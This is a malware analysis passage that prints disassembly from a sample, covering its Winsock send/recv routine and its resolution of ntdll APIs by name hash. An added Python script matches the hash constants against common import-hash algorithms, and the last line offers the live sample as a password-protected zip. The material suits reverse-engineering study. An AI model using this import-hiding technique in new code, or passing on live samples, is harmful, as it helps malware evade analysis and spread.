003B0639 FF75 14 push dword ptr ss:[ebp+0x14] ; buf
003B063C FF75 10 push dword ptr ss:[ebp+0x10] ; socket
003B063F 837D 0C 00 cmp dword ptr ss:[ebp+0xC],0x0 ; direction flag: 0 -> recv
003B0643 75 05 jnz X003B064A
003B0645 FF56 11 call dword ptr ds:[esi+0x11] ; ws2_32.recv: receive data
003B0648 EB 03 jmp X003B064D
003B064A FF56 0D call dword ptr ds:[esi+0xD] ; ws2_32.send
003B064D 83F8 01 cmp eax,0x1
003B0650 7D 07 jge X003B0659
003B0652 61 popad
003B0653 33C0 xor eax,eax
……
00FC0029 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
00FC002C 68 4D4B585A push 0x5A584B4D ; hash of the wanted API name
00FC0031 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC0037 50 push eax
00FC0038 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC003E 50 push eax
00FC003F FF96 DD000000 call dword ptr ds:[esi+0xDD] ; resolve-API-by-hash routine; here it returns RtlCompressBuffer, used to compress the network data
00FC0045 8945 DC mov dword ptr ss:[ebp-0x24],eax
00FC0048 68 01928F05 push 0x58F9201 ; another hash; the resolved API is not identified here (note the different argument [esi+0xABB])
00FC004D 8B86 BB0A0000 mov eax,dword ptr ds:[esi+0xABB]
00FC0053 50 push eax
00FC0054 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC005A 50 push eax
00FC005B FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC0061 8945 F8 mov dword ptr ss:[ebp-0x8],eax
……
00FC026A 50 push eax
00FC026B FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC0271 8983 AC010000 mov dword ptr ds:[ebx+0x1AC],eax ; ntdll.RtlInitializeCriticalSection
00FC0277 68 9CB58598 push 0x9885B59C
00FC027C 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC0282 50 push eax
00FC0283 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC0289 50 push eax
00FC028A FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC0290 8983 E0020000 mov dword ptr ds:[ebx+0x2E0],eax ; ntdll.RtlEnterCriticalSection
00FC0296 68 F076F1CE push 0xCEF176F0
00FC029B 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC02A1 50 push eax
00FC02A2 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC02A8 50 push eax
00FC02A9 FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC02AF 8983 E4020000 mov dword ptr ds:[ebx+0x2E4],eax ; ntdll.RtlLeaveCriticalSection
00FC02B5 68 B3D1BFB0 push 0xB0BFD1B3
00FC02BA 8B86 DB0A0000 mov eax,dword ptr ds:[esi+0xADB]
00FC02C0 50 push eax
00FC02C1 8B86 E1000000 mov eax,dword ptr ds:[esi+0xE1]
00FC02C7 50 push eax
00FC02C8 FF96 DD000000 call dword ptr ds:[esi+0xDD]
00FC02CE 8983 6C030000 mov dword ptr ds:[ebx+0x36C],eax ; ntdll.RtlDeleteCriticalSection
00FC02D4 8D47 1C lea eax,dword ptr ds:[edi+0x1C]
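Every call to [esi+0xDD] above follows the same pattern: push a 32-bit constant, push two values from the structure at esi, call, and store the returned pointer, which the listing identifies as an ntdll export (RtlCompressBuffer, RtlInitializeCriticalSection, ...). That is API resolution by name hash, which hides the imports from static analysis and is why the networking code had to be found by breaking on the Winsock functions at runtime. The page does not state which hash algorithm the sample uses. The script below is an added example, not code from the sample or the original post: it takes the constants and names from the listing and checks them against four common import-hash algorithms (ROR13 and ROR7 over the ASCII name, djb2, CRC32). The choice of candidates and the assumption that only the function name is hashed (no module name, no uppercasing, no UTF-16) are mine; whether any candidate matches these constants is not established on this page, and the script reports whatever it finds.

```python
import binascii

# Hash constants pushed before call [esi+0xDD] in the listing, paired with the API the listing
# attributes to the returned pointer. 0x058F9201 is pushed at 00FC0048 but its result is not named.
PAGE_HASHES = {
    0x5A584B4D: "RtlCompressBuffer",
    0x9885B59C: "RtlInitializeCriticalSection",
    0xCEF176F0: "RtlEnterCriticalSection",
    0xB0BFD1B3: "RtlLeaveCriticalSection",
}
UNNAMED_HASH = 0x058F9201


def ror32(value: int, bits: int) -> int:
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def ror_hash(name: str, bits: int) -> int:
    """h = ror32(h, bits) + byte over the ASCII name (the ROR13-style family of import hashes)."""
    h = 0
    for b in name.encode("ascii"):
        h = (ror32(h, bits) + b) & 0xFFFFFFFF
    return h


def djb2(name: str) -> int:
    h = 5381
    for b in name.encode("ascii"):
        h = (h * 33 + b) & 0xFFFFFFFF
    return h


def crc32(name: str) -> int:
    return binascii.crc32(name.encode("ascii")) & 0xFFFFFFFF


# Candidate algorithms (assumption: the sample may use one of these, or none of them).
ALGORITHMS = {
    "ror13": lambda n: ror_hash(n, 13),
    "ror7": lambda n: ror_hash(n, 7),
    "djb2": djb2,
    "crc32": crc32,
}


def identify(value: int, names, algorithms=ALGORITHMS):
    """Return (algorithm, name) for the first name whose hash equals value, else None."""
    for alg, fn in algorithms.items():
        for name in names:
            if fn(name) == value:
                return alg, name
    return None


def check_page_constants(names=None):
    """Map every constant from the listing to identify(...) over the names the listing gives."""
    names = list(names or PAGE_HASHES.values())
    return {value: identify(value, names) for value in list(PAGE_HASHES) + [UNNAMED_HASH]}


if __name__ == "__main__":
    for value, match in check_page_constants().items():
        listing_says = PAGE_HASHES.get(value, "(not named on the page)")
        print("0x%08X -> %s   (listing says: %s)" % (value, match or "no candidate matched", listing_says))
```

If nothing matches, the usual variants to add to ALGORITHMS are: a non-zero seed, the name uppercased or lowercased, UTF-16 input, a final XOR, or a module-name hash mixed in (the Metasploit ROR13 resolver adds the hash of the DLL name to the function hash). The reliable alternative is the one the post already used: break on the resolver's return and read the pointer out of eax, which is how the ntdll names in the listing were obtained.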
@@@@@@@ Sample download: 样本.zip (unzip password: virus)